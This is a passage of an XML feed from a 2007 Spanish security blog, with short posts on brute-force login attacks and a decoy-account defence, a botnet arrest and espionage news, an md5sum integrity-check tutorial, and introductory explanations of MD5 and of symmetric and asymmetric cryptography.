[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-835635114912039157?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/835635114912039157/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=835635114912039157&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/835635114912039157'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/835635114912039157'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/las-llaves-usb-un-riesgo-de-seguridad.html' title='Las llaves USB, un riesgo de seguridad'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-4246837370513803712</id><published>2007-12-05T15:24:00.000-03:00</published><updated>2008-12-10T12:33:58.544-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Ataques - Servidor Web 2</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nams9blykQY/R1bvy3e7RsI/AAAAAAAAABE/kIhzC0Jb1U0/s1600-h/brute%2Bforce.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_nams9blykQY/R1bvy3e7RsI/AAAAAAAAABE/kIhzC0Jb1U0/s320/brute%2Bforce.gif" alt="" id="BLOGGER_PHOTO_ID_5140559681856161474" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://seguridadsegura.blogspot.com/2007/12/ataques-servidor-web.html"&gt;&lt;span style="font-weight: bold;"&gt;Fuerza bruta&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;*&lt;/span&gt; Los controles de acceso tradicionales constan de una pareja login/password.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;*&lt;/span&gt; Los ataques de fuerza bruta usualmente escogen un “login” válido y prueban un sinfín de passwords diferentes intentando adivinar.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;*&lt;/span&gt; El mismo servidor web proporciona información valiosa al atacante.&lt;br /&gt;&lt;br /&gt;Existen herramientas que automatizan el ataque, forzando el password de un usuario válido del sistema.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;* Usuario-valido / aaaa&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;*&lt;/span&gt; Usuario-valido / aaab&lt;br /&gt;* Usuario-valido / aaac&lt;br /&gt;* Usuario-valido / aaad&lt;br /&gt;&lt;br /&gt;Diversas aplicaciones (por ejemplo de la banca en línea) permiten sólo 3 equivocaciones en la password de acceso, después se bloquean.&lt;br /&gt;&lt;br /&gt;Sin embargo existe un ataque aún más peligroso y “truculento”:&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;*&lt;/span&gt; Si el sistema bloquea la cuenta al 3er. intento, porqué no sólo intentar 1 sola vez?&lt;br /&gt;Esto se hace posible variando el login, en&lt;br /&gt;lugar de la password:&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;* &lt;/span&gt;Usuario-valido1 / aaaa&lt;br /&gt;* Usuario-valido2 / aaaa&lt;br /&gt;* Usuario-valido3 / aaaa&lt;br /&gt;* Usuario-valido4 / aaaa&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Solución:&lt;/span&gt; Insertar cuentas de “señuelo”, que no estén asignadas a ningún usuario válido. Al detectarse un intento de acceso a alguna de estas cuentas señuelo se deben tomar medidas anti-intrusivas. (bloqueo de IPs por ejemplo)&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-4246837370513803712?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/4246837370513803712/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=4246837370513803712&amp;isPopup=true' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4246837370513803712'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4246837370513803712'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/ataques-servidor-web-2.html' title='Ataques - Servidor Web 2'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nams9blykQY/R1bvy3e7RsI/AAAAAAAAABE/kIhzC0Jb1U0/s72-c/brute%2Bforce.gif' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-5481973836014538969</id><published>2007-12-05T12:32:00.000-03:00</published><updated>2007-12-05T12:36:07.770-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Creador de red de “PCs Zombies” es autista</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www2.noticiasdot.com/publicaciones/2004/0904/2609/noticias260904/images/Phishing.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 233px; height: 168px;" src="http://www2.noticiasdot.com/publicaciones/2004/0904/2609/noticias260904/images/Phishing.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Owen Walker&lt;/span&gt;, más conocido como “&lt;span style="font-style: italic;"&gt;Akill&lt;/span&gt;”, fue detenido por la policía de Nueva Zelanda y el FBI acusado de crear un código malicioso que controlaba 1,3 millones de PCs Zombies &lt;p&gt;&lt;span id="more-5597"&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;La policía considera que este joven de 18 años es el creador de un código malicioso muy perfeccionado totalmente transparente para los antivirus y distribuido por el equipo de crackers profesionales “A-team”.&lt;/p&gt; &lt;p&gt;El código de Akill habría infectado a 1,3 millones de ordenadores en todo el mundo pasando a ser controlados por los crackers para enviar spam, infectar otros equipos o vaciar información personal de los usuarios.&lt;/p&gt; &lt;p&gt;Además, estos equipos estarían preparados para realizar ataques DDoS contra otros sistemas.&lt;/p&gt; &lt;p&gt;Según la policía el virus habría causado daños por valor de 20 millones de dólares. El FBI está investigando si el muchacho se enriqueció con el código al entregar este al grupo “A-Team” que fueron los que lo habían distribuido y controlaban la red.&lt;/p&gt; &lt;p&gt; &lt;strong&gt;“Es Autista”&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;La madre de Owen dijo a la prensa que su hijo dispone de de una pasión hacía los ordenadores vinculada al “autismo” que padece. Una de las características de esta enfermedad es el autoaislamiento de los que la padecen.&lt;/p&gt; &lt;p&gt;Por su parte los amigos y compañeros de antiguos trabajaos dijeron que Owen es un programador brillante. Una cualidad que también fue destacada por los responsables de la policía local al afirmar que este “brilla por su capacidad para producir este tipo de códigos”.&lt;/p&gt;&lt;p&gt;Artículo completo &lt;a href="http://seguinfo.blogspot.com/2007/12/creador-de-red-de-pcs-zombies-es.html"&gt;&lt;span style="font-weight: bold;"&gt;Segu-Info&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-5481973836014538969?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/5481973836014538969/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=5481973836014538969&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5481973836014538969'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5481973836014538969'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/creador-de-red-de-pcs-zombies-es.html' title='Creador de red de “PCs Zombies” es autista'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-5202583762430711571</id><published>2007-12-04T23:38:00.000-03:00</published><updated>2007-12-04T23:53:53.008-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>Suma de Verificación con MD5</title><content type='html'>Una &lt;span style="font-weight: bold;"&gt;suma de verificación&lt;/span&gt; o &lt;span style="font-weight: bold;"&gt;checksum&lt;/span&gt; es una forma de control de redundancia, una medida muy simple para proteger la integridad de datos, verificando que no hayan sido corrompidos. Se emplean a diario en muchos ámbitos de Internet, Archivos, Transferencia, etc.&lt;br /&gt;&lt;br /&gt;Vamos a realizar algunas pruebas utilizando el Algoritmo Redundante &lt;a href="http://seguridadsegura.blogspot.com/2007/12/que-es-md5.html"&gt;&lt;span style="font-weight: bold;"&gt;MD5&lt;/span&gt;&lt;/a&gt;, para lo cual vamos a utilizar el Sistema Operativo &lt;span style="font-weight: bold;"&gt;GNU/Linux&lt;/span&gt; y un programa llamado &lt;span style="font-size:130%;"&gt;&lt;code&gt;md5sum&lt;/code&gt;&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Básicamente vamos a realizar lo siguiente, vamos a crear un archivo, lo vamos a pasar por este algoritmo y vamos a ver como saber si este archivo fue modificado o no y si cumple realmente con su integridad.&lt;br /&gt;&lt;br /&gt;Para comenzar creamos un archivo llamado archivo.txt&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;code&gt;$ &lt;span style="font-weight: bold;"&gt;vim archivo.txt&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;y le ingresamos cualquier contenido y lo guardamos.&lt;br /&gt;&lt;br /&gt;Luego ejecutamos el siguiente comando&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;code&gt;$ &lt;span style="font-weight: bold;"&gt;md5sum archivo.txt &gt; archivo.md5&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;lo cual generaremos un archivo ".md5" con el checksum adentro como contenido.&lt;br /&gt;&lt;br /&gt;Ahora bien para comprobar la integridad del archivo "archivo.txt" realizamos lo siguiente:&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;code&gt;$ &lt;span style="font-weight: bold;"&gt;md5sum -c archivo.md5&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;el parámetro -c realiza el chequeo&lt;br /&gt;esto nos puede arrojar dos errores, si el archivo NO fue modificado podemos obtener:&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;code&gt;$ archivo.txt: La suma coincide&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;en caso que SI se haya modificado el archivo nos dirá:&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;code&gt;$ archivo.txt: La suma no coincide&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;De este modo, logramos aplicar el algoritmo MD5 y a través de la suma de redundancia y la verificación logramos corroborar la integridad de los archivo. Cabe aclarar que este algoritmos se puede aplicar a cualquier clase de archivos, bases de datos, imágenes ISO, etc.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-5202583762430711571?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/5202583762430711571/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=5202583762430711571&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5202583762430711571'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5202583762430711571'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/suma-de-verificacin-con-md5.html' title='Suma de Verificación con MD5'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-1902537788114410026</id><published>2007-12-04T22:15:00.000-03:00</published><updated>2007-12-04T22:20:37.286-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>¿Que es MD5?</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://upload.wikimedia.org/wikipedia/commons/7/7e/Ron_Rivest.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://upload.wikimedia.org/wikipedia/commons/7/7e/Ron_Rivest.jpg" alt="" border="0" /&gt;&lt;/a&gt;En el contexto de la Criptografía, &lt;span style="font-weight: bold;"&gt;MD5&lt;/span&gt; (acrónimo de &lt;span style="font-style: italic;"&gt;Message-Digest Algorithm 5&lt;/span&gt;, Algoritmo de Resumen del Mensaje 5) es un Algoritmo de Reducción Criptográfico de 128 bits ampliamente usado.&lt;br /&gt;&lt;br /&gt;Este algoritmo de Redundancia Criptográfica fue diseñado por el profesor &lt;span style="font-weight: bold;"&gt;Ronald Rivest del MIT&lt;/span&gt; (Massachusetts Institute of Technology, Instituto Tecnológico de Masachusets), desarrollado en 1991 como reemplazo del conocido hasta ese momento como MD4 y contemplando las debilidades de la misma.&lt;br /&gt;&lt;br /&gt;A pesar de su amplia difusión actual, la sucesión de problemas de seguridad detectados desde que, en 1996, Hans Dobbertin anunciase una colisión de hash plantea una serie de dudas acerca de su uso futuro.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-1902537788114410026?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/1902537788114410026/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=1902537788114410026&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1902537788114410026'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1902537788114410026'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/que-es-md5.html' title='¿Que es MD5?'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-4361821426000991768</id><published>2007-12-04T21:21:00.000-03:00</published><updated>2007-12-04T21:24:47.596-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Alemania: 18.9% de las 741 empresas consultadas reconoció haber sido víctima de robo de información</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.diarioepoca.com/2007/06/20/fotos/chicas/troyano.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 85px; height: 100px;" src="http://www.diarioepoca.com/2007/06/20/fotos/chicas/troyano.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;a href="http://seguinfo.blogspot.com/2007/12/alemania-189-de-las-741-empresas.html"&gt;&lt;span style="font-weight: bold;"&gt;Segu-Info:&lt;/span&gt;&lt;/a&gt; El espionaje industrial florece en Alemania. Su número de casos crece 10% cada año. Los sectores más afectados son el automotriz, el de la fabricación de aviones y el de maquinaria, así como la industria metalúrgica y de materias primas. El objetivo central del espionaje son las innovaciones técnicas, el know how de los procesos de producción. Detrás de esta metodología hay gobiernos extranjeros y empresas de la competencia. Muchas compañías alemanas no asumen debidamente el peligro y carecen de un concepto integral para prevenirlo.&lt;br /&gt;&lt;br /&gt;Tales son las conclusiones de un estudio realizado por la consultora de negocios Corporate Trust, la Oficina de Criminología Aplicada de Hamburgo y el periódico Handelsblatt de la misma ciudad.&lt;br /&gt;Según el estudio --dado a conocer el pasado 22 de noviembre--, 18.9% de las 741 empresas consultadas reconoció haber sido víctima de robo de información valiosa. La denuncia frente a las autoridades se efectuó sólo en un cuarto de los casos. Las empresas suelen contratar especialistas privados, pero evitan que las filtraciones padecidas se hagan públicas, por temor a perder credibilidad e imagen. A esto hay que sumar la cifra --elevada, según estiman expertos-- de los casos que no han sido descubiertos.&lt;br /&gt;&lt;br /&gt;La información sustraída a través del espionaje va a parar a empresas de la competencia en Alemania y otros países que, de este modo, ahorran gastos de investigación y desarrollo de productos. También a Estados, que así pueden delinear sus estrategias económicas.&lt;br /&gt;El acceso a los datos se realiza por caminos diversos. De acuerdo con el estudio, en &lt;span style="font-weight: bold;"&gt;la mayoría de los casos (20.3%) son los propios empleados quienes brindan datos sensibles&lt;/span&gt;, motivados por el soborno, por ansias de venganza contra la compañía o al ser sorprendidos en un descuido. En algunos casos, el acceso a la información es más fácil de lo que parece. Bastan un par de preguntas formuladas con habilidad --en una feria industrial, por ejemplo-- para arrancarle algunos datos relevantes al interlocutor correcto.&lt;br /&gt;&lt;br /&gt;También se computa como flujo indeseado de información el caso de los empleados que se independizan y los que pasan a trabajar para la competencia.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;De acuerdo con el estudio, en 14.9% de los casos el espionaje industrial se realizó a través de hackers que perforan con “troyanos” la seguridad de las empresas. Le siguen las escuchas secretas de charlas de directivos (10.7%) y la intercepción de llamadas, fax y correos electrónicos (5.3%).&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-4361821426000991768?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/4361821426000991768/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=4361821426000991768&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4361821426000991768'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4361821426000991768'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/alemania-189-de-las-741-empresas.html' title='Alemania: 18.9% de las 741 empresas consultadas reconoció haber sido víctima de robo de información'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-7001314906268322606</id><published>2007-12-03T16:38:00.000-03:00</published><updated>2007-12-03T16:42:15.136-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>Criptografía Asimétrica</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.inixa.com/imagenes/criptografia_asimetrica3.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://www.inixa.com/imagenes/criptografia_asimetrica3.gif" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;La &lt;span style="font-weight: bold;"&gt;Criptografía Asimétrica&lt;/span&gt; es el método criptográfico que usa un par de claves (2 Claves) para el envío de mensajes. Las dos claves pertenecen a la misma persona a la que se ha enviado el mensaje.&lt;br /&gt;&lt;br /&gt;Una &lt;span style="font-weight: bold;"&gt;Clave es Pública&lt;/span&gt; y se puede entregar a cualquier persona, la otra &lt;span style="font-weight: bold;"&gt;Clave es Privada&lt;/span&gt; y el propietario debe guardarla de modo que nadie tenga acceso a ella. El remitente usa la clave pública del destinatario para cifrar el mensaje, y una vez cifrado, sólo la clave privada del destinatario podrá descifrar este mensaje.&lt;br /&gt;&lt;br /&gt;Los sistemas de cifrado de Clave Pública o sistemas de cifrado asimétricos se inventaron con el fin de evitar por completo el problema del intercambio de claves de los sistemas de cifrado simétricos.&lt;br /&gt;&lt;br /&gt;Con las Claves Públicas no es necesario que el remitente y el destinatario se pongan de acuerdo en la clave a emplear. Todo lo que se requiere es que, antes de iniciar la comunicación secreta, el remitente consiga una copia de la clave pública del destinatario. Es más, esa misma clave pública puede ser usada por cualquiera que desee comunicarse con su propietario. Por tanto, se necesitarán sólo n pares de claves por cada n personas que deseen comunicarse entre sí.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-7001314906268322606?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/7001314906268322606/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=7001314906268322606&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7001314906268322606'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7001314906268322606'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/criptografa-asimtrica.html' title='Criptografía Asimétrica'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2053877520986014366</id><published>2007-12-03T14:44:00.000-03:00</published><updated>2007-12-03T14:48:54.940-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>Criptografía Simétrica o Convencional</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.hfernandezdelpech.com.ar/PKI1.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://www.hfernandezdelpech.com.ar/PKI1.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;La &lt;span style="font-weight: bold;"&gt;Criptografía Simétrica&lt;/span&gt; es el método criptográfico con la particularidad que usa una misma Clave para cifrar y descifrar mensajes. Las dos partes que se comunican han de ponerse de acuerdo de antemano sobre la Clave a usar.&lt;br /&gt;&lt;br /&gt;Una vez ambas tienen acceso a esta clave, el remitente cifra un mensaje usándola, lo envía al destinatario, y éste lo descifra con la misma.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2053877520986014366?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2053877520986014366/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2053877520986014366&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2053877520986014366'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2053877520986014366'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/criptografa-simtrica-o-convencional.html' title='Criptografía Simétrica o Convencional'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-4060871627456376773</id><published>2007-12-03T14:31:00.000-03:00</published><updated>2007-12-03T14:32:54.254-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Un grupo de 'crackers' intentaban controlar un millón de ordenadores</title><content type='html'>&lt;div class="post-content"&gt;       &lt;p&gt;Las autoridades de Nueva Zelanda confirmaron hoy que un adolescente de este país ha sido interrogado acerca de la posibilidad de pertenecer a un plan organizado por unos piratas informáticos para controlar más de un millón de ordenadores a través de la Red y usarlos en actividades criminales.&lt;/p&gt; &lt;p&gt;En una investigación iniciada por el &lt;span style="font-weight: bold;"&gt;FBI&lt;/span&gt;, más de 2 millones y medio de personas fueron confirmadas como usuarios de ordenadores que habían sido víctimas de la llamada actividad '&lt;span style="font-style: italic;"&gt;botnet&lt;/span&gt;', informó la cadena CNN.&lt;/p&gt; &lt;p&gt;Los '&lt;span style="font-weight: bold;"&gt;crackers&lt;/span&gt;' ('&lt;span style="font-style: italic;"&gt;hackers&lt;/span&gt;' que persiguen un fin lucrativo) introducían virus, gusanos informáticos y otros programas hostiles que les permitían tomar el control de las computadoras y usarlas para cometer 'ciber crímenes'. Según cifras de la industria, cerca de 5 millones de usuarios podrían tener sus ordenadores infectados sin saberlo.&lt;/p&gt; &lt;p&gt;Articulo @ &lt;a href="http://www.elpais.com/articulo/tecnologia/grupo/crackers/intentaban/controlar/millon/ordenadores/elpeputec/20071202elpeputec_1/Tes"&gt;El Pais&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
